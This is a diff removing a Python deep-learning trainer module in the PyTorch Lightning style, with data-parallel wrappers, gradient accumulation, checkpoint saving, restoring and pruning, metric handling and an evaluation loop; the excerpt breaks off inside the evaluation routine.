- return result
- if isinstance(obj, dict):
- for result in map(get_a_var, obj.items()):
- if isinstance(result, torch.Tensor):
- return result
- return None
-
-
-def data_loader(fn):
- """
- Decorator to make any fx with this use the lazy property
- :param fn:
- :return:
- """
-
- attr_name = '_lazy_' + fn.__name__
-
- @wraps(fn)
- def _get_data_loader(self):
- try:
- value = getattr(self, attr_name)
- except AttributeError:
- try:
- value = fn(self) # Lazy evaluation, done only once.
- if (
- value is not None and
- not isinstance(value, list) and
- fn.__name__ in ['test_dataloader', 'val_dataloader']
- ):
- value = [value]
- except AttributeError as e:
- # Guard against AttributeError suppression. (Issue #142)
- traceback.print_exc()
- error = f'{fn.__name__}: An AttributeError was encountered: ' + str(e)
- raise RuntimeError(error) from e
- setattr(self, attr_name, value) # Memoize evaluation.
- return value
-
- return _get_data_loader
-
-
-def parallel_apply(modules, inputs, kwargs_tup=None, devices=None): # pragma: no cover
- r"""Applies each `module` in :attr:`modules` in parallel on arguments
- contained in :attr:`inputs` (positional) and :attr:`kwargs_tup` (keyword)
- on each of :attr:`devices`.
-
- Args:
- modules (Module): modules to be parallelized
- inputs (tensor): inputs to the modules
- devices (list of int or torch.device): CUDA devices
-
- :attr:`modules`, :attr:`inputs`, :attr:`kwargs_tup` (if given), and
- :attr:`devices` (if given) should all have same length. Moreover, each
- element of :attr:`inputs` can either be a single object as the only argument
- to a module, or a collection of positional arguments.
- """
- assert len(modules) == len(inputs)
- if kwargs_tup is not None:
- assert len(modules) == len(kwargs_tup)
- else:
- kwargs_tup = ({},) * len(modules)
- if devices is not None:
- assert len(modules) == len(devices)
- else:
- devices = [None] * len(modules)
- devices = list(map(lambda x: _get_device_index(x, True), devices))
- lock = threading.Lock()
- results = {}
- grad_enabled = torch.is_grad_enabled()
-
- def _worker(i, module, input, kwargs, device=None):
- torch.set_grad_enabled(grad_enabled)
- if device is None:
- device = get_a_var(input).get_device()
- try:
- with torch.cuda.device(device):
- # this also avoids accidental slicing of `input` if it is a Tensor
- if not isinstance(input, (list, tuple)):
- input = (input,)
-
- # ---------------
- # CHANGE
- if module.training:
- output = module.training_step(*input, **kwargs)
-
- elif module.testing:
- output = module.test_step(*input, **kwargs)
-
- else:
- output = module.validation_step(*input, **kwargs)
- # ---------------
-
- with lock:
- results[i] = output
- except Exception as e:
- with lock:
- results[i] = e
-
- # make sure each module knows what training state it's in...
- # fixes weird bug where copies are out of sync
- root_m = modules[0]
- for m in modules[1:]:
- m.training = root_m.training
- m.testing = root_m.testing
-
- if len(modules) > 1:
- threads = [threading.Thread(target=_worker,
- args=(i, module, input, kwargs, device))
- for i, (module, input, kwargs, device) in
- enumerate(zip(modules, inputs, kwargs_tup, devices))]
-
- for thread in threads:
- thread.start()
- for thread in threads:
- thread.join()
- else:
- _worker(0, modules[0], inputs[0], kwargs_tup[0], devices[0])
-
- outputs = []
- for i in range(len(inputs)):
- output = results[i]
- if isinstance(output, Exception):
- raise output
- outputs.append(output)
- return outputs
-
-
-def _find_tensors(obj): # pragma: no cover
- r"""
- Recursively find all tensors contained in the specified object.
- """
- if isinstance(obj, torch.Tensor):
- return [obj]
- if isinstance(obj, (list, tuple)):
- return itertools.chain(*map(_find_tensors, obj))
- if isinstance(obj, dict):
- return itertools.chain(*map(_find_tensors, obj.values()))
- return []
-
-
-class DDP(DistributedDataParallel):
- """
- Override the forward call in lightning so it goes to training and validation step respectively
- """
-
- def parallel_apply(self, replicas, inputs, kwargs):
- return parallel_apply(replicas, inputs, kwargs, self.device_ids[:len(replicas)])
-
- def forward(self, *inputs, **kwargs): # pragma: no cover
- self._sync_params()
- if self.device_ids:
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- if len(self.device_ids) == 1:
- # --------------
- # LIGHTNING MOD
- # --------------
- # normal
- # output = self.module(*inputs[0], **kwargs[0])
- # lightning
- if self.module.training:
- output = self.module.training_step(*inputs[0], **kwargs[0])
- elif self.module.testing:
- output = self.module.test_step(*inputs[0], **kwargs[0])
- else:
- output = self.module.validation_step(*inputs[0], **kwargs[0])
- else:
- outputs = self.parallel_apply(self._module_copies[:len(inputs)], inputs, kwargs)
- output = self.gather(outputs, self.output_device)
- else:
- # normal
- output = self.module(*inputs, **kwargs)
-
- if torch.is_grad_enabled():
- # We'll return the output object verbatim since it is a freeform
- # object. We need to find any tensors in this object, though,
- # because we need to figure out which parameters were used during
- # this forward pass, to ensure we short circuit reduction for any
- # unused parameters. Only if `find_unused_parameters` is set.
- if self.find_unused_parameters:
- self.reducer.prepare_for_backward(list(_find_tensors(output)))
- else:
- self.reducer.prepare_for_backward([])
- return output
-
-
-class DP(DataParallel):
- """
- Override the forward call in lightning so it goes to training and validation step respectively
- """
-
- def forward(self, *inputs, **kwargs):
- if not self.device_ids:
- return self.module(*inputs, **kwargs)
-
- for t in itertools.chain(self.module.parameters(), self.module.buffers()):
- if t.device != self.src_device_obj:
- raise RuntimeError("module must have its parameters and buffers "
- "on device {} (device_ids[0]) but found one of "
- "them on device: {}".format(self.src_device_obj, t.device))
-
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- if len(self.device_ids) == 1:
- # lightning
- if self.module.training:
- return self.module.training_step(*inputs[0], **kwargs[0])
- elif self.module.testing:
- return self.module.test_step(*inputs[0], **kwargs[0])
- else:
- return self.module.validation_step(*inputs[0], **kwargs[0])
-
- replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
- outputs = self.parallel_apply(replicas, inputs, kwargs)
- return self.gather(outputs, self.output_device)
-
- def parallel_apply(self, replicas, inputs, kwargs):
- return parallel_apply(replicas, inputs, kwargs, self.device_ids[:len(replicas)])
-
-
-class GradientAccumulationScheduler:
- def __init__(self, scheduling: dict):
- if scheduling == {}: # empty dict error
- raise TypeError("An empty dict cannot be interpreted correctly")
-
- for key in scheduling.keys():
- if not isinstance(key, int) or not isinstance(scheduling[key], int):
- raise TypeError("All epochs and accumulation factors must be integers")
-
- minimal_epoch = min(scheduling.keys())
- if minimal_epoch < 1:
- msg = f"Epochs are indexed from 1; epoch {minimal_epoch} cannot be interpreted correctly"
- raise IndexError(msg)
- elif minimal_epoch != 1: # if user didn't define first epoch accumulation factor
- scheduling.update({1: 1})
-
- self.scheduling = scheduling
- self.epochs = sorted(scheduling.keys())
-
- def on_epoch_begin(self, epoch, trainer):
- epoch += 1 # indexing epochs from 1
- for i in reversed(range(len(self.epochs))):
- if epoch >= self.epochs[i]:
- trainer.accumulate_grad_batches = self.scheduling.get(self.epochs[i])
- break
-
-
-class LatestModelCheckpoint(ModelCheckpoint):
- def __init__(self, filepath, monitor='val_loss', verbose=0, num_ckpt_keep=5,
- save_weights_only=False, mode='auto', period=1, prefix='model', save_best=True):
- super(ModelCheckpoint, self).__init__()
- self.monitor = monitor
- self.verbose = verbose
- self.filepath = filepath
- os.makedirs(filepath, exist_ok=True)
- self.num_ckpt_keep = num_ckpt_keep
- self.save_best = save_best
- self.save_weights_only = save_weights_only
- self.period = period
- self.epochs_since_last_check = 0
- self.prefix = prefix
- self.best_k_models = {}
- # {filename: monitor}
- self.kth_best_model = ''
- self.save_top_k = 1
- self.task = None
- if mode == 'min':
- self.monitor_op = np.less
- self.best = np.Inf
- self.mode = 'min'
- elif mode == 'max':
- self.monitor_op = np.greater
- self.best = -np.Inf
- self.mode = 'max'
- else:
- if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):
- self.monitor_op = np.greater
- self.best = -np.Inf
- self.mode = 'max'
- else:
- self.monitor_op = np.less
- self.best = np.Inf
- self.mode = 'min'
- if os.path.exists(f'{self.filepath}/best_valid.npy'):
- self.best = np.load(f'{self.filepath}/best_valid.npy')[0]
-
- def get_all_ckpts(self):
- return sorted(glob.glob(f'{self.filepath}/{self.prefix}_ckpt_steps_*.ckpt'),
- key=lambda x: -int(re.findall('.*steps\_(\d+)\.ckpt', x)[0]))
-
- def on_epoch_end(self, epoch, logs=None):
- logs = logs or {}
- self.epochs_since_last_check += 1
- best_filepath = f'{self.filepath}/{self.prefix}_ckpt_best.pt'
- if self.epochs_since_last_check >= self.period:
- self.epochs_since_last_check = 0
- filepath = f'{self.filepath}/{self.prefix}_ckpt_steps_{self.task.global_step}.ckpt'
- if self.verbose > 0:
- logging.info(f'Epoch {epoch:05d}@{self.task.global_step}: saving model to {filepath}')
- self._save_model(filepath)
- for old_ckpt in self.get_all_ckpts()[self.num_ckpt_keep:]:
- subprocess.check_call(f'rm -rf "{old_ckpt}"', shell=True)
- if self.verbose > 0:
- logging.info(f'Delete ckpt: {os.path.basename(old_ckpt)}')
- current = logs.get(self.monitor)
- if current is not None and self.save_best:
- if self.monitor_op(current, self.best):
- self.best = current
- if self.verbose > 0:
- logging.info(
- f'Epoch {epoch:05d}@{self.task.global_step}: {self.monitor} reached'
- f' {current:0.5f} (best {self.best:0.5f}), saving model to'
- f' {best_filepath} as top 1')
- self._save_model(best_filepath)
- np.save(f'{self.filepath}/best_valid.npy', [self.best])
-
-
-class BaseTrainer:
- def __init__(
- self,
- logger=True,
- checkpoint_callback=True,
- default_save_path=None,
- gradient_clip_val=0,
- process_position=0,
- gpus=-1,
- log_gpu_memory=None,
- show_progress_bar=True,
- track_grad_norm=-1,
- check_val_every_n_epoch=1,
- accumulate_grad_batches=1,
- max_updates=1000,
- min_epochs=1,
- val_check_interval=1.0,
- log_save_interval=100,
- row_log_interval=10,
- print_nan_grads=False,
- weights_summary='full',
- num_sanity_val_steps=5,
- resume_from_checkpoint=None,
- ):
- self.log_gpu_memory = log_gpu_memory
- self.gradient_clip_val = gradient_clip_val
- self.check_val_every_n_epoch = check_val_every_n_epoch
- self.track_grad_norm = track_grad_norm
- self.on_gpu = True if (gpus and torch.cuda.is_available()) else False
- self.process_position = process_position
- self.weights_summary = weights_summary
- self.max_updates = max_updates
- self.min_epochs = min_epochs
- self.num_sanity_val_steps = num_sanity_val_steps
- self.print_nan_grads = print_nan_grads
- self.resume_from_checkpoint = resume_from_checkpoint
- self.default_save_path = default_save_path
-
- # training bookkeeping
- self.total_batch_idx = 0
- self.running_loss = []
- self.avg_loss = 0
- self.batch_idx = 0
- self.tqdm_metrics = {}
- self.callback_metrics = {}
- self.num_val_batches = 0
- self.num_training_batches = 0
- self.num_test_batches = 0
- self.get_train_dataloader = None
- self.get_test_dataloaders = None
- self.get_val_dataloaders = None
- self.is_iterable_train_dataloader = False
-
- # training state
- self.model = None
- self.testing = False
- self.disable_validation = False
- self.lr_schedulers = []
- self.optimizers = None
- self.global_step = 0
- self.current_epoch = 0
- self.total_batches = 0
-
- # configure checkpoint callback
- self.checkpoint_callback = checkpoint_callback
- self.checkpoint_callback.save_function = self.save_checkpoint
- self.weights_save_path = self.checkpoint_callback.filepath
-
- # accumulated grads
- self.configure_accumulated_gradients(accumulate_grad_batches)
-
- # allow int, string and gpu list
- self.data_parallel_device_ids = [
- int(x) for x in os.environ.get("CUDA_VISIBLE_DEVICES", "").split(",") if x != '']
- if len(self.data_parallel_device_ids) == 0:
- self.root_gpu = None
- self.on_gpu = False
- else:
- self.root_gpu = self.data_parallel_device_ids[0]
- self.on_gpu = True
-
- # distributed backend choice
- self.use_ddp = False
- self.use_dp = False
- self.single_gpu = False
- self.distributed_backend = 'ddp' if self.num_gpus > 0 else 'dp'
- self.set_distributed_mode(self.distributed_backend)
-
- self.proc_rank = 0
- self.world_size = 1
- self.node_rank = 0
-
- # can't init progress bar here because starting a new process
- # means the progress_bar won't survive pickling
- self.show_progress_bar = show_progress_bar
-
- # logging
- self.log_save_interval = log_save_interval
- self.val_check_interval = val_check_interval
- self.logger = logger
- self.logger.rank = 0
- self.row_log_interval = row_log_interval
-
- @property
- def num_gpus(self):
- gpus = self.data_parallel_device_ids
- if gpus is None:
- return 0
- else:
- return len(gpus)
-
- @property
- def data_parallel(self):
- return self.use_dp or self.use_ddp
-
- def get_model(self):
- is_dp_module = isinstance(self.model, (DDP, DP))
- model = self.model.module if is_dp_module else self.model
- return model
-
- # -----------------------------
- # MODEL TRAINING
- # -----------------------------
- def fit(self, model):
- if self.use_ddp:
- mp.spawn(self.ddp_train, nprocs=self.num_gpus, args=(model,))
- else:
- model.model = model.build_model()
- if not self.testing:
- self.optimizers, self.lr_schedulers = self.init_optimizers(model.configure_optimizers())
- if self.use_dp:
- model.cuda(self.root_gpu)
- model = DP(model, device_ids=self.data_parallel_device_ids)
- elif self.single_gpu:
- model.cuda(self.root_gpu)
- self.run_pretrain_routine(model)
- return 1
-
- def init_optimizers(self, optimizers):
-
- # single optimizer
- if isinstance(optimizers, Optimizer):
- return [optimizers], []
-
- # two lists
- elif len(optimizers) == 2 and isinstance(optimizers[0], list):
- optimizers, lr_schedulers = optimizers
- return optimizers, lr_schedulers
-
- # single list or tuple
- elif isinstance(optimizers, list) or isinstance(optimizers, tuple):
- return optimizers, []
-
- def run_pretrain_routine(self, model):
- """Sanity check a few things before starting actual training.
-
- :param model:
- """
- ref_model = model
- if self.data_parallel:
- ref_model = model.module
-
- # give model convenience properties
- ref_model.trainer = self
-
- # set local properties on the model
- self.copy_trainer_model_properties(ref_model)
-
- # link up experiment object
- if self.logger is not None:
- ref_model.logger = self.logger
- self.logger.save()
-
- if self.use_ddp:
- dist.barrier()
-
- # set up checkpoint callback
- # self.configure_checkpoint_callback()
-
- # transfer data loaders from model
- self.get_dataloaders(ref_model)
-
- # track model now.
- # if cluster resets state, the model will update with the saved weights
- self.model = model
-
- # restore training and model before hpc call
- self.restore_weights(model)
-
- # when testing requested only run test and return
- if self.testing:
- self.run_evaluation(test=True)
- return
-
- # check if we should run validation during training
- self.disable_validation = self.num_val_batches == 0
-
- # run tiny validation (if validation defined)
- # to make sure program won't crash during val
- ref_model.on_sanity_check_start()
- ref_model.on_train_start()
- if not self.disable_validation and self.num_sanity_val_steps > 0:
- # init progress bars for validation sanity check
- pbar = tqdm.tqdm(desc='Validation sanity check',
- total=self.num_sanity_val_steps * len(self.get_val_dataloaders()),
- leave=False, position=2 * self.process_position,
- disable=not self.show_progress_bar, dynamic_ncols=True, unit='batch')
- self.main_progress_bar = pbar
- # dummy validation progress bar
- self.val_progress_bar = tqdm.tqdm(disable=True)
-
- self.evaluate(model, self.get_val_dataloaders(), self.num_sanity_val_steps, self.testing)
-
- # close progress bars
- self.main_progress_bar.close()
- self.val_progress_bar.close()
-
- # init progress bar
- pbar = tqdm.tqdm(leave=True, position=2 * self.process_position,
- disable=not self.show_progress_bar, dynamic_ncols=True, unit='batch',
- file=sys.stdout)
- self.main_progress_bar = pbar
-
- # clear cache before training
- if self.on_gpu:
- torch.cuda.empty_cache()
-
- # CORE TRAINING LOOP
- self.train()
-
- def test(self, model):
- self.testing = True
- self.fit(model)
-
- @property
- def training_tqdm_dict(self):
- tqdm_dict = {
- 'step': '{}'.format(self.global_step),
- }
- tqdm_dict.update(self.tqdm_metrics)
- return tqdm_dict
-
- # --------------------
- # restore ckpt
- # --------------------
- def restore_weights(self, model):
- """
- To restore weights we have two cases.
- First, attempt to restore hpc weights. If successful, don't restore
- other weights.
-
- Otherwise, try to restore actual weights
- :param model:
- :return:
- """
- # clear cache before restore
- if self.on_gpu:
- torch.cuda.empty_cache()
-
- if self.resume_from_checkpoint is not None:
- self.restore(self.resume_from_checkpoint, on_gpu=self.on_gpu)
- else:
- # restore weights if same exp version
- self.restore_state_if_checkpoint_exists(model)
-
- # wait for all models to restore weights
- if self.use_ddp:
- # wait for all processes to catch up
- dist.barrier()
-
- # clear cache after restore
- if self.on_gpu:
- torch.cuda.empty_cache()
-
- def restore_state_if_checkpoint_exists(self, model):
- did_restore = False
-
- # do nothing if there's no dir or callback
- no_ckpt_callback = (self.checkpoint_callback is None) or (not self.checkpoint_callback)
- if no_ckpt_callback or not os.path.exists(self.checkpoint_callback.filepath):
- return did_restore
-
- # restore trainer state and model if there is a weight for this experiment
- last_steps = -1
- last_ckpt_name = None
-
- # find last epoch
- checkpoints = os.listdir(self.checkpoint_callback.filepath)
- for name in checkpoints:
- if '.ckpt' in name and not name.endswith('part'):
- if 'steps_' in name:
- steps = name.split('steps_')[1]
- steps = int(re.sub('[^0-9]', '', steps))
-
- if steps > last_steps:
- last_steps = steps
- last_ckpt_name = name
-
- # restore last checkpoint
- if last_ckpt_name is not None:
- last_ckpt_path = os.path.join(self.checkpoint_callback.filepath, last_ckpt_name)
- self.restore(last_ckpt_path, self.on_gpu)
- logging.info(f'model and trainer restored from checkpoint: {last_ckpt_path}')
- did_restore = True
-
- return did_restore
-
- def restore(self, checkpoint_path, on_gpu):
- checkpoint = torch.load(checkpoint_path, map_location='cpu')
-
- # load model state
- model = self.get_model()
-
- # load the state_dict on the model automatically
- model.load_state_dict(checkpoint['state_dict'], strict=False)
- if on_gpu:
- model.cuda(self.root_gpu)
- # load training state (affects trainer only)
- self.restore_training_state(checkpoint)
- model.global_step = self.global_step
- del checkpoint
-
- try:
- if dist.is_initialized() and dist.get_rank() > 0:
- return
- except Exception as e:
- print(e)
- return
-
- def restore_training_state(self, checkpoint):
- """
- Restore trainer state.
- Model will get its chance to update
- :param checkpoint:
- :return:
- """
- if self.checkpoint_callback is not None and self.checkpoint_callback is not False:
- self.checkpoint_callback.best = checkpoint['checkpoint_callback_best']
-
- self.global_step = checkpoint['global_step']
- self.current_epoch = checkpoint['epoch']
-
- if self.testing:
- return
-
- # restore the optimizers
- optimizer_states = checkpoint['optimizer_states']
- for optimizer, opt_state in zip(self.optimizers, optimizer_states):
- if optimizer is None:
- return
- optimizer.load_state_dict(opt_state)
-
- # move optimizer to GPU 1 weight at a time
- # avoids OOM
- if self.root_gpu is not None:
- for state in optimizer.state.values():
- for k, v in state.items():
- if isinstance(v, torch.Tensor):
- state[k] = v.cuda(self.root_gpu)
-
- # restore the lr schedulers
- lr_schedulers = checkpoint['lr_schedulers']
- for scheduler, lrs_state in zip(self.lr_schedulers, lr_schedulers):
- scheduler.load_state_dict(lrs_state)
-
- # --------------------
- # MODEL SAVE CHECKPOINT
- # --------------------
- def _atomic_save(self, checkpoint, filepath):
- """Saves a checkpoint atomically, avoiding the creation of incomplete checkpoints.
-
- This will create a temporary checkpoint with a suffix of ``.part``, then move it to the final location once
- saving is finished.
-
- Args:
- checkpoint (object): The object to save.
- Built to be used with the ``dump_checkpoint`` method, but can deal with anything which ``torch.save``
- accepts.
- filepath (str|pathlib.Path): The path to which the checkpoint will be saved.
- This points to the file that the checkpoint will be stored in.
- """
- tmp_path = str(filepath) + ".part"
- torch.save(checkpoint, tmp_path)
- os.replace(tmp_path, filepath)
-
- def save_checkpoint(self, filepath):
- checkpoint = self.dump_checkpoint()
- self._atomic_save(checkpoint, filepath)
-
- def dump_checkpoint(self):
-
- checkpoint = {
- 'epoch': self.current_epoch,
- 'global_step': self.global_step
- }
-
- if self.checkpoint_callback is not None and self.checkpoint_callback is not False:
- checkpoint['checkpoint_callback_best'] = self.checkpoint_callback.best
-
- # save optimizers
- optimizer_states = []
- for i, optimizer in enumerate(self.optimizers):
- if optimizer is not None:
- optimizer_states.append(optimizer.state_dict())
-
- checkpoint['optimizer_states'] = optimizer_states
-
- # save lr schedulers
- lr_schedulers = []
- for i, scheduler in enumerate(self.lr_schedulers):
- lr_schedulers.append(scheduler.state_dict())
-
- checkpoint['lr_schedulers'] = lr_schedulers
-
- # add the hparams and state_dict from the model
- model = self.get_model()
- checkpoint['state_dict'] = model.state_dict()
- # give the model a chance to add a few things
- model.on_save_checkpoint(checkpoint)
-
- return checkpoint
-
- def copy_trainer_model_properties(self, model):
- if isinstance(model, DP):
- ref_model = model.module
- elif isinstance(model, DDP):
- ref_model = model.module
- else:
- ref_model = model
-
- for m in [model, ref_model]:
- m.trainer = self
- m.on_gpu = self.on_gpu
- m.use_dp = self.use_dp
- m.use_ddp = self.use_ddp
- m.testing = self.testing
- m.single_gpu = self.single_gpu
-
- def transfer_batch_to_gpu(self, batch, gpu_id):
- # base case: object can be directly moved using `cuda` or `to`
- if callable(getattr(batch, 'cuda', None)):
- return batch.cuda(gpu_id, non_blocking=True)
-
- elif callable(getattr(batch, 'to', None)):
- return batch.to(torch.device('cuda', gpu_id), non_blocking=True)
-
- # when list
- elif isinstance(batch, list):
- for i, x in enumerate(batch):
- batch[i] = self.transfer_batch_to_gpu(x, gpu_id)
- return batch
-
- # when tuple
- elif isinstance(batch, tuple):
- batch = list(batch)
- for i, x in enumerate(batch):
- batch[i] = self.transfer_batch_to_gpu(x, gpu_id)
- return tuple(batch)
-
- # when dict
- elif isinstance(batch, dict):
- for k, v in batch.items():
- batch[k] = self.transfer_batch_to_gpu(v, gpu_id)
-
- return batch
-
- # nothing matches, return the value as is without transform
- return batch
-
- def set_distributed_mode(self, distributed_backend):
- # skip for CPU
- if self.num_gpus == 0:
- return
-
- # single GPU case
- # in single gpu case we allow ddp so we can train on multiple
- # nodes, 1 gpu per node
- elif self.num_gpus == 1:
- self.single_gpu = True
- self.use_dp = False
- self.use_ddp = False
- self.root_gpu = 0
- self.data_parallel_device_ids = [0]
- else:
- if distributed_backend is not None:
- self.use_dp = distributed_backend == 'dp'
- self.use_ddp = distributed_backend == 'ddp'
- elif distributed_backend is None:
- self.use_dp = True
- self.use_ddp = False
-
- logging.info(f'gpu available: {torch.cuda.is_available()}, used: {self.on_gpu}')
-
- def ddp_train(self, gpu_idx, model):
- """
- Entry point into a DP thread
- :param gpu_idx:
- :param model:
- :param cluster_obj:
- :return:
- """
- # otherwise default to node rank 0
- self.node_rank = 0
-
- # show progressbar only on progress_rank 0
- self.show_progress_bar = self.show_progress_bar and self.node_rank == 0 and gpu_idx == 0
-
- # determine which process we are and world size
- if self.use_ddp:
- self.proc_rank = self.node_rank * self.num_gpus + gpu_idx
- self.world_size = self.num_gpus
-
- # let the exp know the rank to avoid overwriting logs
- if self.logger is not None:
- self.logger.rank = self.proc_rank
-
- # set up server using proc 0's ip address
- # try to init for 20 times at max in case ports are taken
- # where to store ip_table
- model.trainer = self
- model.init_ddp_connection(self.proc_rank, self.world_size)
-
- # CHOOSE OPTIMIZER
- # allow for lr schedulers as well
- model.model = model.build_model()
- if not self.testing:
- self.optimizers, self.lr_schedulers = self.init_optimizers(model.configure_optimizers())
-
- # MODEL
- # copy model to each gpu
- if self.distributed_backend == 'ddp':
- torch.cuda.set_device(gpu_idx)
- model.cuda(gpu_idx)
-
- # set model properties before going into wrapper
- self.copy_trainer_model_properties(model)
-
- # override root GPU
- self.root_gpu = gpu_idx
-
- if self.distributed_backend == 'ddp':
- device_ids = [gpu_idx]
- else:
- device_ids = None
-
- # allow user to configure ddp
- model = model.configure_ddp(model, device_ids)
-
- # continue training routine
- self.run_pretrain_routine(model)
-
- def resolve_root_node_address(self, root_node):
- if '[' in root_node:
- name = root_node.split('[')[0]
- number = root_node.split(',')[0]
- if '-' in number:
- number = number.split('-')[0]
-
- number = re.sub('[^0-9]', '', number)
- root_node = name + number
-
- return root_node
-
- def log_metrics(self, metrics, grad_norm_dic, step=None):
- """Logs the metric dict passed in.
-
- :param metrics:
- :param grad_norm_dic:
- """
- # added metrics by Lightning for convenience
- metrics['epoch'] = self.current_epoch
-
- # add norms
- metrics.update(grad_norm_dic)
-
- # turn all tensors to scalars
- scalar_metrics = self.metrics_to_scalars(metrics)
-
- step = step if step is not None else self.global_step
- # log actual metrics
- if self.proc_rank == 0 and self.logger is not None:
- self.logger.log_metrics(scalar_metrics, step=step)
- self.logger.save()
-
- def add_tqdm_metrics(self, metrics):
- for k, v in metrics.items():
- if type(v) is torch.Tensor:
- v = v.item()
-
- self.tqdm_metrics[k] = v
-
- def metrics_to_scalars(self, metrics):
- new_metrics = {}
- for k, v in metrics.items():
- if isinstance(v, torch.Tensor):
- v = v.item()
-
- if type(v) is dict:
- v = self.metrics_to_scalars(v)
-
- new_metrics[k] = v
-
- return new_metrics
-
- def process_output(self, output, train=False):
- """Reduces output according to the training mode.
-
- Separates loss from logging and tqdm metrics
- :param output:
- :return:
- """
- # ---------------
- # EXTRACT CALLBACK KEYS
- # ---------------
- # all keys not progress_bar or log are candidates for callbacks
- callback_metrics = {}
- for k, v in output.items():
- if k not in ['progress_bar', 'log', 'hiddens']:
- callback_metrics[k] = v
-
- if train and self.use_dp:
- num_gpus = self.num_gpus
- callback_metrics = self.reduce_distributed_output(callback_metrics, num_gpus)
-
- for k, v in callback_metrics.items():
- if isinstance(v, torch.Tensor):
- callback_metrics[k] = v.item()
-
- # ---------------
- # EXTRACT PROGRESS BAR KEYS
- # ---------------
- try:
- progress_output = output['progress_bar']
-
- # reduce progress metrics for tqdm when using dp
- if train and self.use_dp:
- num_gpus = self.num_gpus
- progress_output = self.reduce_distributed_output(progress_output, num_gpus)
-
- progress_bar_metrics = progress_output
- except Exception:
- progress_bar_metrics = {}
-
- # ---------------
- # EXTRACT LOGGING KEYS
- # ---------------
- # extract metrics to log to experiment
- try:
- log_output = output['log']
-
- # reduce progress metrics for tqdm when using dp
- if train and self.use_dp:
- num_gpus = self.num_gpus
- log_output = self.reduce_distributed_output(log_output, num_gpus)
-
- log_metrics = log_output
- except Exception:
- log_metrics = {}
-
- # ---------------
- # EXTRACT LOSS
- # ---------------
- # if output dict doesn't have the keyword loss
- # then assume the output=loss if scalar
- loss = None
- if train:
- try:
- loss = output['loss']
- except Exception:
- if type(output) is torch.Tensor:
- loss = output
- else:
- raise RuntimeError(
- 'No `loss` value in the dictionary returned from `model.training_step()`.'
- )
-
- # when using dp need to reduce the loss
- if self.use_dp:
- loss = self.reduce_distributed_output(loss, self.num_gpus)
-
- # ---------------
- # EXTRACT HIDDEN
- # ---------------
- hiddens = output.get('hiddens')
-
- # use every metric passed in as a candidate for callback
- callback_metrics.update(progress_bar_metrics)
- callback_metrics.update(log_metrics)
-
- # convert tensors to numpy
- for k, v in callback_metrics.items():
- if isinstance(v, torch.Tensor):
- callback_metrics[k] = v.item()
-
- return loss, progress_bar_metrics, log_metrics, callback_metrics, hiddens
-
- def reduce_distributed_output(self, output, num_gpus):
- if num_gpus <= 1:
- return output
-
- # when using DP, we get one output per gpu
- # average outputs and return
- if type(output) is torch.Tensor:
- return output.mean()
-
- for k, v in output.items():
- # recurse on nested dicts
- if isinstance(output[k], dict):
- output[k] = self.reduce_distributed_output(output[k], num_gpus)
-
- # do nothing when there's a scalar
- elif isinstance(output[k], torch.Tensor) and output[k].dim() == 0:
- pass
-
- # reduce only metrics that have the same number of gpus
- elif output[k].size(0) == num_gpus:
- reduced = torch.mean(output[k])
- output[k] = reduced
- return output
-
- def clip_gradients(self):
- if self.gradient_clip_val > 0:
- model = self.get_model()
- torch.nn.utils.clip_grad_norm_(model.parameters(), self.gradient_clip_val)
-
- def print_nan_gradients(self):
- model = self.get_model()
- for param in model.parameters():
- if (param.grad is not None) and torch.isnan(param.grad.float()).any():
- logging.info(param, param.grad)
-
- def configure_accumulated_gradients(self, accumulate_grad_batches):
- self.accumulate_grad_batches = None
-
- if isinstance(accumulate_grad_batches, dict):
- self.accumulation_scheduler = GradientAccumulationScheduler(accumulate_grad_batches)
- elif isinstance(accumulate_grad_batches, int):
- schedule = {1: accumulate_grad_batches}
- self.accumulation_scheduler = GradientAccumulationScheduler(schedule)
- else:
- raise TypeError("Gradient accumulation supports only int and dict types")
-
- def get_dataloaders(self, model):
- if not self.testing:
- self.init_train_dataloader(model)
- self.init_val_dataloader(model)
- else:
- self.init_test_dataloader(model)
-
- if self.use_ddp:
- dist.barrier()
- if not self.testing:
- self.get_train_dataloader()
- self.get_val_dataloaders()
- else:
- self.get_test_dataloaders()
-
- def init_train_dataloader(self, model):
- self.fisrt_epoch = True
- self.get_train_dataloader = model.train_dataloader
- if isinstance(self.get_train_dataloader(), torch.utils.data.DataLoader):
- self.num_training_batches = len(self.get_train_dataloader())
- self.num_training_batches = int(self.num_training_batches)
- else:
- self.num_training_batches = float('inf')
- self.is_iterable_train_dataloader = True
- if isinstance(self.val_check_interval, int):
- self.val_check_batch = self.val_check_interval
- else:
- self._percent_range_check('val_check_interval')
- self.val_check_batch = int(self.num_training_batches * self.val_check_interval)
- self.val_check_batch = max(1, self.val_check_batch)
-
- def init_val_dataloader(self, model):
- self.get_val_dataloaders = model.val_dataloader
- self.num_val_batches = 0
- if self.get_val_dataloaders() is not None:
- if isinstance(self.get_val_dataloaders()[0], torch.utils.data.DataLoader):
- self.num_val_batches = sum(len(dataloader) for dataloader in self.get_val_dataloaders())
- self.num_val_batches = int(self.num_val_batches)
- else:
- self.num_val_batches = float('inf')
-
- def init_test_dataloader(self, model):
- self.get_test_dataloaders = model.test_dataloader
- if self.get_test_dataloaders() is not None:
- if isinstance(self.get_test_dataloaders()[0], torch.utils.data.DataLoader):
- self.num_test_batches = sum(len(dataloader) for dataloader in self.get_test_dataloaders())
- self.num_test_batches = int(self.num_test_batches)
- else:
- self.num_test_batches = float('inf')
-
- def evaluate(self, model, dataloaders, max_batches, test=False):
- """Run evaluation code.
-
- :param model: PT model
- :param dataloaders: list of PT dataloaders
- :param max_batches: Scalar
- :param test: boolean
- :return:
- """
- # enable eval mode
- model.zero_grad()
- model.eval()
-
- # copy properties for forward overrides
- self.copy_trainer_model_properties(model)
-
- # disable gradients to save memory
- torch.set_grad_enabled(False)
-
- if test:
- self.get_model().test_start()
- # bookkeeping
- outputs = []
-
- # run evaluation over each dataloader
- for dataloader_idx, dataloader in enumerate(dataloaders):
- dl_outputs = []
- for batch_idx, batch in enumerate(dataloader):
-
- if batch is None: # pragma: no cover
- continue
-
- # stop short when on fast_dev_run (sets max_batch=1)
- if batch_idx >= max_batches:
- break
-
- # -----------------
- # RUN EVALUATION STEP
- # -----------------
- output = self.evaluation_forward(model,
- batch,
- batch_idx,
- dataloader_idx,
- test)
-
- # track outputs for collation
- dl_outputs.append(output)
-
- # batch done
- if test:
